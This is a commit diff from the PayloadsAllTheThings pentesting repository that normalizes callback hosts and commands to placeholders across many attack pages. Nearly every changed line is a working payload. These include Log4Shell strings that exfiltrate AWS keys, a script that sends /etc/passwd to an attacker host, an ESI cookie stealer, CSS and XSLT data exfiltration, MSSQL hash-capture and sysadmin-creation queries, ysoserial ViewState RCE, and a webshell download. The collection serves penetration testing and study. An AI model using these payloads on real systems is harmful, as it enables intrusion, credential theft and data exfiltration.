gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-04-28 11:33:06 -07:00
Code Issues Packages Projects Releases Wiki Activity

Normalize commands, callbacks and references

Browse Source
This commit is contained in:
Swissky
2026-04-22 15:03:31 +02:00
parent a79b1f5692
commit d4e6eda4ad
17 changed files with 114 additions and 114 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
API Key Leaks/IIS-Machine-Keys.md
View File

@@ -98,8 +98,8 @@ Try multiple machine keys from known products, Microsoft documentation, or other
python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r
python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5 python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5
python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/ python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/
python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/ python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://10.10.10.10:8080/
python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/ python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://10.10.10.10:8080/a1/b/c1/
``` ```
* [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r) * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
@@ -143,7 +143,7 @@ First you need to decode the Viewstate to know if the MAC and the encryption are
### MAC Is Not Enabled ### MAC Is Not Enabled
```ps1 ```ps1
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami"
``` ```
### MAC Is Enabled And Encryption Is Disabled ### MAC Is Enabled And Encryption Is Disabled
@@ -159,8 +159,8 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
* Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used. * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
```ps1 ```ps1
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c nslookup http://attacker.com" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
# --generator = `__VIEWSTATEGENERATOR` parameter value # --generator = `__VIEWSTATEGENERATOR` parameter value
# --validationkey = validation key from the previous command # --validationkey = validation key from the previous command
@@ -175,13 +175,13 @@ If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework
* **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
```ps1 ```ps1
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
``` ```
* **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"` * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
```ps1 ```ps1
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
``` ```
## Edit Cookies With The Machine Key ## Edit Cookies With The Machine Key

12
Account Takeover/README.md
View File

@@ -33,17 +33,17 @@
### Account Takeover Through Password Reset Poisoning ### Account Takeover Through Password Reset Poisoning
1. Intercept the password reset request in Burp Suite 1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com` 2. Add or edit the following headers in Burp Suite : `Host: [ATTACKER.DOMAIN.TLD]`, `X-Forwarded-Host: [ATTACKER.DOMAIN.TLD]`
3. Forward the request with the modified header 3. Forward the request with the modified header
```http ```http
POST https://example.com/reset.php HTTP/1.1 POST https://example.com/reset.php HTTP/1.1
Accept: */* Accept: */*
Content-Type: application/json Content-Type: application/json
Host: attacker.com Host: [ATTACKER.DOMAIN.TLD]
``` ```
4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN` 4. Look for a password reset URL based on the *host header* like : `https://[ATTACKER.DOMAIN.TLD]/reset-password.php?token=TOKEN`
### Password Reset via Email Parameter ### Password Reset via Email Parameter
@@ -142,7 +142,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data: 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
```powershell ```powershell
GET http://something.burpcollaborator.net HTTP/1.1 GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1
X: X:
``` ```
@@ -157,7 +157,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
0 0
GET http://something.burpcollaborator.net HTTP/1.1 GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1
X: X X: X
``` ```
@@ -173,7 +173,7 @@ Hackerone reports exploiting this bug
### Account Takeover via JWT ### Account Takeover via JWT
JSON Web Token might be used to authenticate an user. JSON Web Token might be used to authenticate a user.
* Edit the JWT with another User ID / Email * Edit the JWT with another User ID / Email
* Check for weak JWT signature * Check for weak JWT signature

2
CONTRIBUTING.md
View File

@@ -12,7 +12,7 @@ In order to provide the safest payloads for the community, the following rules m
- Payloads must be sanitized - Payloads must be sanitized
- Use `id`, and `whoami`, for RCE Proof of Concepts - Use `id`, and `whoami`, for RCE Proof of Concepts
- Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc. - Use `[ATTACKER.DOMAIN.TLD]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
- Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses - Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses
- Use `Administrator` for privileged users and `User` for normal account - Use `Administrator` for privileged users and `User` for normal account
- Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples - Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples

8
CSS Injection/README.md
View File

@@ -47,7 +47,7 @@ input[value^="TOKEN_012"] {
```css ```css
input[name="pin"][value="1234"] { input[name="pin"][value="1234"] {
background: url(https://attacker.com/log?pin=1234); background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);
} }
``` ```
@@ -57,7 +57,7 @@ input[name="pin"][value="1234"] {
```css ```css
input[name="csrf-token"][value^="a"] + input { input[name="csrf-token"][value^="a"] + input {
background: url(https://example.com?q=a) background: url(https://[ATTACKER.DOMAIN.TLD]/?q=a)
} }
``` ```
@@ -76,8 +76,8 @@ div:has(input[value="1337"]) {
This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks. This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks.
```html ```html
<style>@import url(http://attacker.com/staging?len=32);</style> <style>@import url(http://[ATTACKER.DOMAIN.TLD]/staging?len=32);</style>
<style>@import'//YOUR-PAYLOAD.oastify.com'</style> <style>@import'//[ATTACKER.DOMAIN.TLD]'</style>
``` ```
Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles. Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles.

2
CSV Injection/README.md
View File

@@ -76,7 +76,7 @@ Google Sheets allows some additional formulas that are able to fetch remote URLs
So one can test blind formula injection or a potential for data exfiltration with: So one can test blind formula injection or a potential for data exfiltration with:
```text ```text
=IMPORTXML("http://[REDACTED]/csv", "//a/@href") =IMPORTXML("http://[ATTACKER.DOMAIN.TLD]/csv", "//a/@href")
``` ```
Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization. Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.

48
CVE Exploits/Log4Shell.md
View File

@@ -45,13 +45,13 @@ bundle:config:db.password
## Scanning ## Scanning
* [log4j-scan](https://github.com/fullhunt/log4j-scan) * [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) - Log4Shell scanning utility
```powershell ```powershell
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
[--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-test
python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass python3 log4j-scan.py -u http://10.10.10.10:8080 --waf-bypass
``` ```
* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml) * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
@@ -59,16 +59,16 @@ bundle:config:db.password
## WAF Bypass ## WAF Bypass
```powershell ```powershell
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.10:1389/a}
# using lower and upper # using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc} ${${lower:jndi}:${lower:rmi}://10.10.10.10:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc} ${j${loWer:Nd}i${uPper::}://10.10.10.10:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
# using env to create the letter # using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//[ATTACKER.DOMAIN.TLD]/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//[ATTACKER.DOMAIN.TLD]/a}
``` ```
## Exploitation ## Exploitation
@@ -76,32 +76,32 @@ ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attack
### Environment variables exfiltration ### Environment variables exfiltration
```powershell ```powershell
${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/ ${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/
# AWS Access Key # AWS Access Key
${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY} ${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
``` ```
### Remote Command Execution ### Remote Command Execution
* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi) * [artsploit/rogue-jndi](https://github.com/artsploit/rogue-jndi) - Rogue JNDI LDAP/RMI exploitation server
```ps1 ```ps1
java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21" java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname "10.10.10.10"
Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference Mapping ldap://10.10.10.11:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference Mapping ldap://10.10.10.11:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat Mapping ldap://10.10.10.11:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy Mapping ldap://10.10.10.11:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1 Mapping ldap://10.10.10.11:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1 Mapping ldap://10.10.10.11:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2 Mapping ldap://10.10.10.11:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2 Mapping ldap://10.10.10.11:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
``` ```
* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit) * [pimps/JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit) - JNDI exploitation helper toolkit
## References ## References
* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/) * [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - LunaSec - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/) * [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - LunaSec - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/) * [PSA: Log4Shell and the current state of JNDI injection - Moritz Bechler - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)

2
Command Injection/README.md
View File

@@ -134,7 +134,7 @@ Sometimes, direct command execution from the injection might not be possible, bu
```ps1 ```ps1
# -o, --output <file> Write to file instead of stdout # -o, --output <file> Write to file instead of stdout
curl http://evil.attacker.com/ -o webshell.php curl http://[ATTACKER.DOMAIN.TLD]/ -o webshell.php
``` ```
### Inside A Command ### Inside A Command

4
Headless Browser/README.md
View File

@@ -53,7 +53,7 @@ Since the file access is allowed, an atacker can create and expose an HTML file
async function getFlag(){ async function getFlag(){
response = await fetch("file:///etc/passwd"); response = await fetch("file:///etc/passwd");
flag = await response.text(); flag = await response.text();
fetch("https://attacker.com/", { method: "POST", body: flag}) fetch("https://[ATTACKER.DOMAIN.TLD]/", { method: "POST", body: flag})
}; };
getFlag(); getFlag();
</script> </script>
@@ -106,7 +106,7 @@ The Remote Debugging Port in a headless browser (like Headless Chrome or Chromiu
* Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices` * Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices`
* Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs * Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs
* Data stored in the settings (username, passwords, token): `chrome://settings` * Data stored in the settings (username, passwords, token): `chrome://settings`
* Port Scan: In a loop open `http://localhost:<port>/json/new?http://callback.example.com?port=<port>` * Port Scan: In a loop open `http://localhost:<port>/json/new?http://[ATTACKER.DOMAIN.TLD]/?port=<port>`
* Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version` * Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version`
```json ```json

2
SAML Injection/README.md
View File

@@ -174,7 +174,7 @@ Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_At
<xsl:template match="doc"> <xsl:template match="doc">
<xsl:variable name="file" select="unparsed-text('/etc/passwd')"/> <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
<xsl:variable name="escaped" select="encode-for-uri($file)"/> <xsl:variable name="escaped" select="encode-for-uri($file)"/>
<xsl:variable name="attackerUrl" select="'http://attacker.com/'"/> <xsl:variable name="attackerUrl" select="'http://[ATTACKER.DOMAIN.TLD]/'"/>
<xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/> <xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/>
<xsl:value-of select="unparsed-text($exploitUrl)"/> <xsl:value-of select="unparsed-text($exploitUrl)"/>
</xsl:template> </xsl:template>

36
SQL Injection/MSSQL Injection.md
View File

@@ -304,14 +304,14 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
* **Permission**: Requires `VIEW SERVER STATE` permission on the server. * **Permission**: Requires `VIEW SERVER STATE` permission on the server.
```powershell ```powershell
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null)) 1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.xem',null,null))
``` ```
* **Permission**: Requires the `CONTROL SERVER` permission. * **Permission**: Requires the `CONTROL SERVER` permission.
```powershell ```powershell
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default))) 1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default)) 1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.trc',default))
``` ```
### MSSQL UNC Path ### MSSQL UNC Path
@@ -319,21 +319,21 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
```sql ```sql
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 1'; use master; exec xp_dirtree '\\10.10.10.10\SHARE';--
``` ```
```sql ```sql
xp_dirtree '\\attackerip\file' xp_dirtree '\\10.10.10.10\file'
xp_fileexist '\\attackerip\file' xp_fileexist '\\10.10.10.10\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file' BACKUP LOG [TESTING] TO DISK = '\\10.10.10.10\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file' BACKUP DATABASE [TESTING] TO DISK = '\\10.10.10.10\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file' RESTORE LOG [TESTING] FROM DISK = '\\10.10.10.10\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file' RESTORE DATABASE [TESTING] FROM DISK = '\\10.10.10.10\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file' RESTORE HEADERONLY FROM DISK = '\\10.10.10.10\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file' RESTORE FILELISTONLY FROM DISK = '\\10.10.10.10\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file' RESTORE LABELONLY FROM DISK = '\\10.10.10.10\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file' RESTORE REWINDONLY FROM DISK = '\\10.10.10.10\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file' RESTORE VERIFYONLY FROM DISK = '\\10.10.10.10\file'
``` ```
## MSSQL Trusted Links ## MSSQL Trusted Links
@@ -366,8 +366,8 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
-- Create a SQL user and give sysadmin privileges -- Create a SQL user and give sysadmin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2" EXECUTE('EXECUTE(''CREATE LOGIN User WITH PASSWORD = ''''Password123'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2" EXECUTE('EXECUTE(''sp_addsrvrolemember ''''User'''' , ''''sysadmin'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
``` ```
## MSSQL Privileges ## MSSQL Privileges
@@ -402,7 +402,7 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
### MSSQL Make User DBA ### MSSQL Make User DBA
```sql ```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; EXEC master.dbo.sp_addsrvrolemember 'User', 'sysadmin';
``` ```
## MSSQL Database Credentials ## MSSQL Database Credentials

8
Server Side Include Injection/README.md
View File

@@ -48,12 +48,12 @@ Surrogate-Control: content="ESI/1.0"
| Description | Payload | | Description | Payload |
| ----------------------- | ---------------------------------------- | | ----------------------- | ---------------------------------------- |
| Blind detection | `<esi:include src=http://attacker.com>` | | Blind detection | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]>` |
| XSS | `<esi:include src=http://attacker.com/XSSPAYLOAD.html>` | | XSS | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/XSSPAYLOAD.html>` |
| Cookie stealer | `<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>` | | Cookie stealer | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
| Include a file | `<esi:include src="supersecret.txt">` | | Include a file | `<esi:include src="supersecret.txt">` |
| Display debug info | `<esi:debug/>` | | Display debug info | `<esi:debug/>` |
| Add header | `<!--esi $add_header('Location','http://attacker.com') -->` | | Add header | `<!--esi $add_header('Location','http://[ATTACKER.DOMAIN.TLD]') -->` |
| Inline fragment | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` | | Inline fragment | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` |
| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist | | Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |

2
Server Side Request Forgery/SSRF-Advanced-Exploitation.md
View File

@@ -120,7 +120,7 @@ The following PHP script can be used to generate a page that will redirect to th
$commands = array( $commands = array(
'HELO victim.com', 'HELO victim.com',
'MAIL FROM: <admin@victim.com>', 'MAIL FROM: <admin@victim.com>',
'RCPT To: <hacker@attacker.com>', 'RCPT To: <User@[ATTACKER.DOMAIN.TLD]>',
'DATA', 'DATA',
'Subject: @hacker!', 'Subject: @hacker!',
'Hello Friend', 'Hello Friend',

10
Server Side Template Injection/Java.md
View File

@@ -397,7 +397,7 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
DNS lookup DNS lookup
```java ```java
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")} ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","[ATTACKER.DOMAIN.TLD]")}
``` ```
### SpEL - Session Attributes ### SpEL - Session Attributes
@@ -413,7 +413,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
- Method using `java.lang.Runtime` #1 - accessed with JavaClass - Method using `java.lang.Runtime` #1 - accessed with JavaClass
```java ```java
${T(java.lang.Runtime).getRuntime().exec("COMMAND_HERE")} ${T(java.lang.Runtime).getRuntime().exec("whoami")}
``` ```
- Method using `java.lang.Runtime` #2 - Method using `java.lang.Runtime` #2
@@ -427,13 +427,13 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
- Method using `java.lang.Runtime` #3 - accessed with `invoke` - Method using `java.lang.Runtime` #3 - accessed with `invoke`
```java ```java
${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('COMMAND_HERE')} ${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
``` ```
- Method using `java.lang.Runtime` #3 - accessed with `javax.script.ScriptEngineManager` - Method using `java.lang.Runtime` #3 - accessed with `javax.script.ScriptEngineManager`
```java ```java
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))} ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"whoami\\\")"))}
``` ```
- Method using `java.lang.ProcessBuilder` - Method using `java.lang.ProcessBuilder`
@@ -442,7 +442,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())} ${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
${request.getAttribute("c").add("cmd.exe")} ${request.getAttribute("c").add("cmd.exe")}
${request.getAttribute("c").add("/k")} ${request.getAttribute("c").add("/k")}
${request.getAttribute("c").add("ping x.x.x.x")} ${request.getAttribute("c").add("whoami")}
